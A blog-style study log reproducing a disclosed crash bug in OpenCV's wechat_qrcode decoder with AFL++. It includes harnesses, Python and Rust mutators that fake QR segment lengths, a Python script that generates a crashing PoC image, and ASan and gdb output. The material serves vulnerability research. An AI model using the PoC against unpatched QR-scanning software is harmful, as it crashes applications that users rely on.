wechat qrcode bug fuzzing
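TL;DR: For the recently disclosed QR code parsing bug in opencv_contrib/modules/wechat_qrcode, I wrote a custom mutator (in both Python and Rust) and used AFL++ to fuzz my way to the bug.
I recently picked fuzzing back up to learn some bug-hunting techniques, since I'm getting ready to look for a job; academia just isn't working out for me. This post is my study log.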
Start a new aflplusplus container:
cd /src
git clone https://github.com/opencv/opencv_contrib.git
git -C opencv_contrib checkout 960b3f685f39c0602b8a0dd35973a82ee72b7e3c
git clone https://github.com/opencv/opencv.git
git -C opencv checkout 85ea247cc6fd840ee477d03fc9aa31c8c7f6d9ef
mkdir build && cd build
cmake -DCMAKE_C_COMPILER=afl-clang-fast -DCMAKE_CXX_COMPILER=afl-clang-fast++ -DBUILD_SHARED_LIBS=OFF -DOPENCV_EXTRA_MODULES_PATH=/src/opencv_contrib/modules /src/opencv
Modify opencv_contrib/modules/wechat_qrcode/test/test_main.cpp:
#include <iostream>
#include <vector>
#include <string>
#include "test_precomp.hpp"
#include "opencv2/objdetect.hpp"
#include "opencv2/wechat_qrcode.hpp"

using namespace std;
using namespace cv;

int main(int argc, char **argv) {
    if (argc < 2) return 1;
    string image_path(argv[1]);
    Mat src = imread(image_path, IMREAD_GRAYSCALE);
    if (!src.empty()) {
        wechat_qrcode::WeChatQRCode detector;
        vector<string> outs = detector.detectAndDecode(src);
        // print outs
        for (size_t i = 0; i < outs.size(); i++) {
            cout << outs[i] << endl;
        }
    }
    return 0;
}
AFL_USE_ASAN=1 make -j32 -C modules/wechat_qrcode
target: bin/opencv_test_wechat_qrcode
After the build, try a PoC to make sure nothing went wrong during compilation.
Code for generating the PoC, for reference:
import qrcode
from qrcode.util import *
from qrcode import QRCode


def hack_put(self, num, length):
    if num == 0:
        num = 1  # make a fake length, too big will not crash
    for i in range(length):
        self.put_bit(((num >> (length - i - 1)) & 1) == 1)


qrcode.util.BitBuffer.put = hack_put  # random_put

qr = QRCode(1, qrcode.constants.ERROR_CORRECT_L, mask_pattern=0)
data = "POC".encode("utf-8")
# 19 is the Total Number of Data Codewords for version 1-L; the -3 is because
# the mode and length indicators take 24 bits in total, exactly 3 bytes.
data += b' ' * (19 - len(data) - 3)
user_data = QRData(data, MODE_8BIT_BYTE)
hack_data = QRData(b'', MODE_8BIT_BYTE)
qr.add_data(user_data)
qr.add_data(hack_data)
img = qr.make_image()
img.save('hack.png')
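The capacity arithmetic in the comment above can be double-checked with a few lines of Python. This is only a sketch: the constant and function names are mine, and the 8-bit count indicator assumes byte mode in QR versions 1 to 9.

```python
# Back-of-the-envelope bit budget for a version 1-L QR code.
# Names are illustrative; they do not come from the qrcode library.
DATA_CODEWORDS_1L = 19       # data codewords for version 1, EC level L
MODE_BITS = 4                # mode indicator
COUNT_BITS_BYTE_MODE = 8     # character count indicator, byte mode, versions 1-9


def payload_bytes(segments: int) -> int:
    """Whole payload bytes left after the headers of `segments` byte-mode segments."""
    total_bits = DATA_CODEWORDS_1L * 8
    header_bits = segments * (MODE_BITS + COUNT_BITS_BYTE_MODE)
    return (total_bits - header_bits) // 8


print(payload_bytes(2))  # 16: two headers take 24 bits, i.e. 3 bytes
```

With two segments the headers eat exactly 3 bytes, which is why the PoC pads its first segment to 16 bytes and leaves nothing for the second one.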
I won't write up the bug analysis; the PR mentioned above makes it clear. For more background on QR codes, see this reproduction write-up: WECHAT二维码闪退分析 - FreeBuf网络安全行业门户
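At this point you could grab some QR code images and start fuzzing like crazy. But even a very small QR code image is more than 300 bytes, and with bit-level mutation the result will most likely fail OpenCV's parsing of the image file itself, so you could keep mutating forever and still never trigger this bug.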
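One plausible reason blind bit flips rarely get past image parsing (my assumption, not something measured in this post) is that every PNG chunk carries a CRC-32 over its type and data, so a decoder that verifies CRCs rejects almost any flipped bit. A small sketch with made-up helper names:

```python
import struct
import zlib


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Build one PNG chunk: length, type, data, CRC-32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def chunk_crc_ok(chunk: bytes) -> bool:
    """Recompute the CRC of a single chunk and compare it with the stored one."""
    length = struct.unpack(">I", chunk[:4])[0]
    body = chunk[4:8 + length]                       # type + data
    stored = struct.unpack(">I", chunk[8 + length:12 + length])[0]
    return (zlib.crc32(body) & 0xFFFFFFFF) == stored


def flip_bit(buf: bytes, bit_index: int) -> bytes:
    """Return a copy of buf with exactly one bit flipped."""
    out = bytearray(buf)
    out[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(out)


chunk = png_chunk(b"IDAT", zlib.compress(b"\x00" + b"\xff" * 21))
mutated = flip_bit(chunk, 8 * 10)  # one bit inside the compressed data
print(chunk_crc_ok(chunk), chunk_crc_ok(mutated))
```

Even when the CRC is not enforced, the flipped bit lands in zlib-compressed data, so it is unlikely to map to a clean change in the QR payload.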
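So the natural idea is to mutate on top of a correctly formed QR code image. evilpan has already tried this, but his mutation space was fairly broad: he randomly generated every optional QR code field and then applied bit flips to the resulting valid QR code. In his tests, a month of fuzzing produced no crash. That is how normal fuzzing should be done, but here I am holding a hammer and looking for the nail, so I do targeted mutation.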
AFL++ persistent mode
Persistent mode is much faster than default AFL++; the official docs cite a 10x to 20x speedup. See: AFLplusplus/instrumentation/README.persistent_mode.md at stable · AFLplusplus/AFLplusplus · GitHub
In my actual fuzzing runs, persistent mode was indeed more than 10 times faster than the default build of opencv_test_wechat_qrcode.
Modify opencv_contrib/modules/wechat_qrcode/test/test_main.cpp:
#include <iostream>
#include <vector>
#include <string>
#include "test_precomp.hpp"
#include "opencv2/objdetect.hpp"
#include "opencv2/wechat_qrcode.hpp"

using namespace std;
using namespace cv;

int fuzz_buf(unsigned char *buf, size_t size) {
    Mat src = imdecode(Mat(1, size, CV_8UC1, buf), IMREAD_GRAYSCALE);
    if (!src.empty()) {
        auto detector = wechat_qrcode::WeChatQRCode();
        std::vector<std::string> outs = detector.detectAndDecode(src);
        return outs.size();
    }
    return -1;
}

__AFL_FUZZ_INIT();

int main() {
    // anything else here, e.g. command line arguments, initialization, etc.
#ifdef __AFL_HAVE_MANUAL_CONTROL
    __AFL_INIT();
#endif
    unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;  // must be after __AFL_INIT
                                                   // and before __AFL_LOOP!
    while (__AFL_LOOP(10000)) {
        int len = __AFL_FUZZ_TESTCASE_LEN;  // don't use the macro directly in a
                                            // call!
        if (len < 8) continue;  // check for a required/useful minimum input length
        /* Setup function call, e.g. struct target *tmp = libtarget_init() */
        /* Call function to be fuzzed, e.g.: */
        fuzz_buf(buf, len);
        /* Reset state. e.g. libtarget_free(tmp) */
    }
    return 0;
}
The build target path is the same:
target: bin/opencv_test_wechat_qrcode
mv bin/opencv_test_wechat_qrcode bin/opencv_test_wechat_qrcode_persist
fuzzing cmd:
afl-fuzz -i corpus/ -o output -t +2000 -- ./opencv_test_wechat_qrcode_persist
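Put a few QR code images that decode correctly under corpus/.
After fuzzing for nearly a day, nothing useful came out. The 28 crashing files were all cv::Exception raised by OpenCV's own input validation.
These are image-parsing exceptions, and the resulting Aborted is not useful either: execution never reached the key decode function in the target submodule.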
terminate called after throwing an instance of 'cv::Exception'
what(): OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:77: error: (-215:Assertion failed) static_cast<size_t>(size.height) <= CV_IO_MAX_IMAGE_HEIGHT in function 'validateInputImageSize'
Aborted (core dumped)
34304
terminate called after throwing an instance of 'cv::Exception'
what(): OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:79: error: (-215:Assertion failed) pixels <= CV_IO_MAX_IMAGE_PIXELS in function 'validateInputImageSize'
Aborted (core dumped)
34304
terminate called after throwing an instance of 'cv::Exception'
what(): OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:75: error: (-215:Assertion failed) static_cast<size_t>(size.width) <= CV_IO_MAX_IMAGE_WIDTH in function 'validateInputImageSize'
This matches the fuzzing results evilpan got in his tests.
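Sorting crash files like these by hand gets tedious, so here is a rough triage sketch. It assumes the non-persistent binary that takes an image path as argv[1], and a crash directory such as output/default/crashes; the function names and bucket labels are made up for illustration.

```python
import subprocess
import sys
from pathlib import Path


def classify(stderr_text: str) -> str:
    """Bucket a run by what its stderr looks like."""
    if "AddressSanitizer" in stderr_text:
        return "asan"            # real memory error, worth a closer look
    if "cv::Exception" in stderr_text:
        return "cv_exception"    # rejected by OpenCV's own checks
    return "other"


def triage(binary: str, crash_dir: str) -> dict:
    """Replay every file in crash_dir through binary and group file names by bucket."""
    buckets = {}
    for path in sorted(Path(crash_dir).iterdir()):
        if not path.is_file() or path.name == "README.txt":
            continue
        proc = subprocess.run([binary, str(path)], capture_output=True,
                              text=True, errors="replace", timeout=60)
        buckets.setdefault(classify(proc.stderr), []).append(path.name)
    return buckets


if __name__ == "__main__" and len(sys.argv) == 3:
    # e.g. python triage.py ./opencv_test_wechat_qrcode output/default/crashes
    for kind, names in triage(sys.argv[1], sys.argv[2]).items():
        print(kind, len(names))
```

If every file lands in the cv_exception bucket, as happened here, the fuzzer is still stuck in image decoding.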
custom mutator
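Next comes the hammer-looking-for-a-nail part. We already know the cause of the bug: in opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp, the function DecodedBitStreamParser::decodeByteSegment assigns nBytes and count incorrectly, so when reading a data segment of a QR code it can end up with count ≠ 0 while the data is empty, which eventually leads to an invalid memory access. See the PR mentioned above for the detailed analysis.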
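To make the "count ≠ 0 but data is empty" condition concrete, here is a toy model in Python. It is not the zxing code: BitSource, pack_bits, and parse_segments are my own simplified stand-ins, and it only handles byte-mode segments with an 8-bit count as in versions 1 to 9.

```python
BYTE_MODE = 0b0100


class BitSource:
    """Minimal MSB-first bit reader over a bytes object."""

    def __init__(self, data: bytes):
        self.data = data
        self.pos = 0  # read position in bits

    def available(self) -> int:
        return len(self.data) * 8 - self.pos

    def read(self, nbits: int) -> int:
        if nbits > self.available():
            raise ValueError("not enough bits")
        value = 0
        for _ in range(nbits):
            bit = (self.data[self.pos // 8] >> (7 - self.pos % 8)) & 1
            value = (value << 1) | bit
            self.pos += 1
        return value


def pack_bits(fields) -> bytes:
    """Pack (value, nbits) pairs MSB-first, zero-padded to a byte boundary."""
    acc, n = 0, 0
    for value, nbits in fields:
        acc = (acc << nbits) | (value & ((1 << nbits) - 1))
        n += nbits
    pad = (-n) % 8
    return (acc << pad).to_bytes((n + pad) // 8, "big")


def parse_segments(codewords: bytes):
    """Return (declared_count, bytes_actually_present) for each byte-mode segment."""
    src, report = BitSource(codewords), []
    while src.available() >= 4:
        if src.read(4) != BYTE_MODE or src.available() < 8:
            break
        count = src.read(8)
        present = min(count, src.available() // 8)
        for _ in range(present):
            src.read(8)
        report.append((count, present))
    return report


payload = b"POC" + b" " * 13
poc = pack_bits([(BYTE_MODE, 4), (16, 8)] + [(b, 8) for b in payload]
                + [(BYTE_MODE, 4), (1, 8)])
print(len(poc), parse_segments(poc))  # 19 [(16, 16), (1, 0)]
```

The second segment declares one byte but the 19 codewords are already used up, which is the kind of mismatch a parser has to reject instead of trusting the count.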
To keep things simple, we can write a custom mutator that generates a small QR code and then randomly mutates the length of a data segment and its count field:
import qrcode
from qrcode.util import *
import random
from qrcode import util, QRCode
from bisect import bisect_left
from io import BytesIO


def hack_data_len(data):
    # return len(data)  # original
    return random.randint(0, 18)  # make a fake length, too big will not crash


def hack_create_data(version, error_correction, data_list):
    buffer = BitBuffer()
    for data in data_list:
        buffer.put(data.mode, 4)
        data_len = hack_data_len(data)
        buffer.put(data_len, length_in_bits(data.mode, version))
        data.write(buffer)

    # Calculate the maximum number of bits for the given version.
    rs_blocks = base.rs_blocks(version, error_correction)
    bit_limit = sum(block.data_count * 8 for block in rs_blocks)
    if len(buffer) > bit_limit:
        raise exceptions.DataOverflowError(
            "Code length overflow. Data size (%s) > size available (%s)"
            % (len(buffer), bit_limit)
        )

    # Terminate the bits (add up to four 0s).
    for _ in range(min(bit_limit - len(buffer), 4)):
        buffer.put_bit(False)

    # Delimit the string into 8-bit words, padding with 0s if necessary.
    delimit = len(buffer) % 8
    if delimit:
        for _ in range(8 - delimit):
            buffer.put_bit(False)

    # Add special alternating padding bitstrings until buffer is full.
    bytes_to_fill = (bit_limit - len(buffer)) // 8
    for i in range(bytes_to_fill):
        if i % 2 == 0:
            buffer.put(PAD0, 8)
        else:
            buffer.put(PAD1, 8)

    return create_bytes(buffer, rs_blocks)


qrcode.util.create_data = hack_create_data


def init(seed):
    """
    Called once when AFLFuzz starts up. Used to seed our RNG.
    @type seed: int
    @param seed: A 32-bit random value
    """
    random.seed(233)


def fuzz(buf, add_buf, max_size):
    """
    Called per fuzzing iteration.
    @type buf: bytearray
    @param buf: The buffer that should be mutated.
    @type add_buf: bytearray
    @param add_buf: A second buffer that can be used as mutation source.
    @type max_size: int
    @param max_size: Maximum size of the mutated output. The mutation must not
                     produce data larger than max_size.
    @rtype: bytearray
    @return: A new bytearray containing the mutated data
    """
    # 1-L mode: controllable data is at most 16 bytes
    qr = QRCode(1, qrcode.constants.ERROR_CORRECT_L, mask_pattern=0)
    data = b"deadbeef" * random.randint(0, 4)
    data2 = b"deadbeef" * random.randint(0, 4)
    qr.add_data(QRData(data, MODE_8BIT_BYTE))
    qr.add_data(QRData(data2, MODE_8BIT_BYTE))
    img = qr.make_image()
    img_bytes = BytesIO()
    img.save(img_bytes, "png")
    return bytearray(img_bytes.getvalue())
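Here we pick version 1-L, whose data capacity is 19 codewords. The mode and count indicators take 3 of those bytes, so the data we control is 16 bytes long. Each segment is a random number of repetitions of b"deadbeef" (up to 4 × 8 = 32 bytes with randint(0, 4)), which is enough to guarantee an overflow.
qrcode.make_image always calls qrcode.util.create_data, so we override that function. The only change is that, when writing data_list into buffer, the count field is set to a random length, data_len = hack_data_len(data). hack_data_len is limited to [0, 18], which is just enough to exceed 16 and overflow.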
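Before handing a mutator like this to AFL++, it is worth a dry run outside the fuzzer. The sketch below only checks what the docstring of fuzz() promises (a bytearray no larger than max_size) plus the PNG signature; check_mutator_output and dry_run are hypothetical helper names, not part of AFL++.

```python
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def check_mutator_output(out, max_size: int) -> list:
    """Return a list of human-readable problems with one fuzz() result."""
    problems = []
    if not isinstance(out, bytearray):
        problems.append("fuzz() should return a bytearray")
        return problems
    if len(out) > max_size:
        problems.append("output is %d bytes, max_size is %d" % (len(out), max_size))
    if bytes(out[:8]) != PNG_MAGIC:
        problems.append("output does not start with the PNG signature")
    return problems


def dry_run(fuzz_fn, rounds: int = 100, max_size: int = 1 << 20) -> list:
    """Call fuzz_fn repeatedly and collect (round, problem) pairs."""
    seed_input = bytearray(b"seed")
    failures = []
    for i in range(rounds):
        out = fuzz_fn(seed_input, None, max_size)
        failures.extend((i, p) for p in check_mutator_output(out, max_size))
    return failures


# Usage with the mutator module above, assuming it is saved as qrcode_mutator.py:
#   import qrcode_mutator
#   qrcode_mutator.init(0)
#   print(dry_run(qrcode_mutator.fuzz))
```

An empty list means every generated image at least looks like a PNG and fits in the buffer AFL++ offers; it says nothing about whether the QR code inside is decodable.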
fuzzing cmd:
AFL_CUSTOM_MUTATOR_ONLY=1 PYTHONPATH=$PWD AFL_PYTHON_MODULE=qrcode_mutator afl-fuzz -i corpus/ -o output_w_mutator -t +9000 -- ./opencv_test_wechat_qrcode_persist
A crash showed up within half an hour, and the very first crash hit the target bug.
QR code analysis from QRazyBox - QR Code Analysis and Recovery Toolkit (merri.cx)
[AFL++ ca32c4c1ac87] /src/build/fuzzing # ./opencv_test_wechat_qrcode output_w_mutator/id-000000.png
AddressSanitizer:DEADLYSIGNAL
=================================================================
==204888==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000005 (pc 0x7f3e12b0fa60 bp 0x7ffc402fcff0 sp 0x7ffc402fc7a8 T0)
==204888==The signal is caused by a READ memory access.
==204888==Hint: address points to the zero page.
#0 0x7f3e12b0fa60 (/lib/x86_64-linux-gnu/libc.so.6+0xc4a60) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
#1 0x55a00ce4a497 in __interceptor_memcpy (/src/build/fuzzing/opencv_test_wechat_qrcode+0x3c6497) (BuildId: 96f5964f2bbc86cfa7923e5f345d712478fc66a8)
#2 0x7f3e12de0892 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_append(char const*, unsigned long) (/lib/x86_64-linux-gnu/libstdc++.so.6+0x14d892) (BuildId: f57e02bfadacc0c923c82457d5e18e1830b5faea)
#3 0x55a00d343a9e in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::append(char const*, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/basic_string.h:1246:9
#4 0x55a00d343a9e in zxing::qrcode::DecodedBitStreamParser::append(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, char const*, unsigned long, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp:108:12
#5 0x55a00d343a9e in zxing::qrcode::DecodedBitStreamParser::decodeByteSegment(zxing::Ref<zxing::BitSource>, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, int, zxing::common::CharacterSetECI*, zxing::ArrayRef<zxing::ArrayRef<char> >&, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp:227:5
#6 0x55a00d348d03 in zxing::qrcode::DecodedBitStreamParser::decode(zxing::ArrayRef<char>, zxing::qrcode::Version*, zxing::qrcode::ErrorCorrectionLevel const&, zxing::ErrorHandler&, int) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp:463:25
#7 0x55a00d2509be in zxing::qrcode::Decoder::decode(zxing::Ref<zxing::BitMatrix>, bool, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoder.cpp:158:20
#8 0x55a00d24d50b in zxing::qrcode::Decoder::decode(zxing::Ref<zxing::BitMatrix>, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoder.cpp:47:30
#9 0x55a00d1d7259 in zxing::qrcode::QRCodeReader::decodeMore(zxing::Ref<zxing::BinaryBitmap>, zxing::Ref<zxing::BitMatrix>, zxing::DecodeHints, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/qrcode_reader.cpp:120:30
#10 0x55a00d1d3936 in zxing::qrcode::QRCodeReader::decode(zxing::Ref<zxing::BinaryBitmap>, zxing::DecodeHints) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/qrcode_reader.cpp:46:31
#11 0x55a00d1fab94 in cv::wechat_qrcode::DecoderMgr::Decode(zxing::Ref<zxing::BinaryBitmap>, zxing::DecodeHints) /src/opencv_contrib/modules/wechat_qrcode/src/decodermgr.cpp:89:21
#12 0x55a00d1fab94 in cv::wechat_qrcode::DecoderMgr::TryDecode(zxing::Ref<zxing::LuminanceSource>, std::vector<zxing::Ref<zxing::Result>, std::allocator<zxing::Ref<zxing::Result> > >&) /src/opencv_contrib/modules/wechat_qrcode/src/decodermgr.cpp:78:15
#13 0x55a00d1f465f in cv::wechat_qrcode::DecoderMgr::decodeImage(cv::Mat, bool, std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&, std::vector<std::vector<cv::Point_<float>, std::allocator<cv::Point_<float> > >, std::allocator<std::vector<cv::Point_<float>, std::allocator<cv::Point_<float> > > > >&) /src/opencv_contrib/modules/wechat_qrcode/src/decodermgr.cpp:46:19
#14 0x55a00d1c87e8 in cv::wechat_qrcode::WeChatQRCode::Impl::decode[abi:cxx11](cv::Mat const&, std::vector<cv::Mat, std::allocator<cv::Mat> >&, std::vector<cv::Mat, std::allocator<cv::Mat> >&) /src/opencv_contrib/modules/wechat_qrcode/src/wechat_qrcode.cpp:148:34
#15 0x55a00d1c674a in cv::wechat_qrcode::WeChatQRCode::detectAndDecode[abi:cxx11](cv::_InputArray const&, cv::_OutputArray const&) /src/opencv_contrib/modules/wechat_qrcode/src/wechat_qrcode.cpp:100:19
#16 0x55a00cee699f in main /src/opencv_contrib/modules/wechat_qrcode/test/test_main.cpp:27:40
#17 0x7f3e12a74d8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
#18 0x7f3e12a74e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
#19 0x55a00ce31d04 in _start (/src/build/fuzzing/opencv_test_wechat_qrcode+0x3add04) (BuildId: 96f5964f2bbc86cfa7923e5f345d712478fc66a8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xc4a60) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
==204888==ABORTING
custom mutator(Rust)
Python is too slow, so here is a Rust version; AFL++ has an official example to use as a reference. Dependencies:
image = "0.22.0"
qrcode git v0.11.2
rand = "0.8.4"
#![cfg(unix)]
#![allow(unused_variables)]

use custom_mutator::{export_mutator, CustomMutator};
use image::Luma;
use qrcode::QrCode;
use qrcode::bits::Bits;
use qrcode::types::{EcLevel, Version};
use rand::Rng;

struct ExampleMutator {
    own_image_buffer: Vec<u8>,
}

impl CustomMutator for ExampleMutator {
    type Error = ();

    fn init(seed: u32) -> Result<Self, Self::Error> {
        // print a message to console
        println!("ExampleMutator init() called with seed {}", seed);
        Ok(Self {
            own_image_buffer: Vec::new(),
        })
    }

    fn fuzz<'b, 's: 'b>(
        &'s mut self,
        buffer: &'b mut [u8],
        add_buff: Option<&[u8]>,
        max_size: usize,
    ) -> Result<Option<&'b [u8]>, Self::Error> {
        let bytes_data: &[u8] = b"deadbeef";
        let bytes_data1 = bytes_data.repeat(rand::thread_rng().gen_range(0..=3));
        let bytes_data2 = bytes_data.repeat(rand::thread_rng().gen_range(0..=3));
        let mut bits: Bits = Bits::new(Version::Normal(1));
        bits.push_byte_data(bytes_data1.as_slice());
        bits.push_byte_data(bytes_data2.as_slice());
        bits.push_terminator(EcLevel::L);
        let qrcode = QrCode::with_bits(bits, EcLevel::L).unwrap();
        let image = qrcode.render::<Luma<u8>>().build();
        image.save("./temp-rust-qrcode.png").unwrap();
        let bytes_vec = std::fs::read("./temp-rust-qrcode.png").unwrap();
        self.own_image_buffer = bytes_vec;
        Ok(Some(self.own_image_buffer.as_slice()))
    }
}

export_mutator!(ExampleMutator);
This requires patching the rust-qrcode library. The key change is one function in bits.rs:
use rand::Rng;

impl Bits {
    /// Encodes 8-bit byte data to the bits.
    pub fn push_byte_data(&mut self, data: &[u8]) -> QrResult<()> {
        // use the thread-local RNG to pick a fake length between 0 and 17 (inclusive)
        let data_len = rand::thread_rng().gen_range(0..=17);
        self.push_header(Mode::Byte, data_len)?;
        for b in data {
            self.push_number(8, u16::from(*b));
        }
        Ok(())
    }
}
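That is, the second argument of push_header is replaced with a random number, the same idea as in the Python code. The rust-qrcode project also needs the rand crate added as a dependency.
After this change, the generated QR code fails an assertion in the construct_codewords function in ec.rs, so I simply commented that assertion out.
After building, pass the path of the resulting .so file through the following environment variable: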
export AFL_CUSTOM_MUTATOR_LIBRARY=/src/build/fuzzing/rust_mutator/target/debug/examples/libexample_mutator.so
fuzzing cmd:
AFL_CUSTOM_MUTATOR_ONLY=1 afl-fuzz -i corpus/ -o output_w_rust -t +5000 -- ./opencv_test_wechat_qrcode_persist
It is a lot faster: from about 6 executions per second to about 180 per second.
manual check
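In gdb, based on the crash report above, set one breakpoint on zxing::qrcode::DecodedBitStreamParser::decodeByteSegment and another on memcpy, then run.
Below is the state when the first data segment is read. Under the System V amd64 calling convention, the arguments of void *memcpy(void *dst, const void *src, size_t count) are passed in rdi, rsi, rdx, in that order. rdx holds the length 16, and rsi points to the string "deadbeefdeadbeef".
Continue execution to the read of the next data segment:
memcpy is asked to copy 13 bytes, but rsi points to 0x0, so the access is bound to be invalid.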
summary
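This bug really is hard to reach by fuzzing. You need a mutator designed specifically around the decode process to have a chance of finding it quickly; otherwise the fuzzer just keeps going in circles inside the image parsing code.
I only found it because I knew where the bug was first and then designed the mutator around it, so this result is quite weak. Fuzzing all fields would require rewriting much more of the QR code generation code, along with a fairly deep understanding of QR codes.
Also, this QR code mutator only generates random variants and does not seem to benefit from AFL++'s power schedule; my feeling is that coverage guidance is not really being applied.
As a learning demo, though, it's okay.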
ref:
针对二维码解析库的 Fuzzing 测试 (Fuzzing QR code parsing libraries) (seebug.org)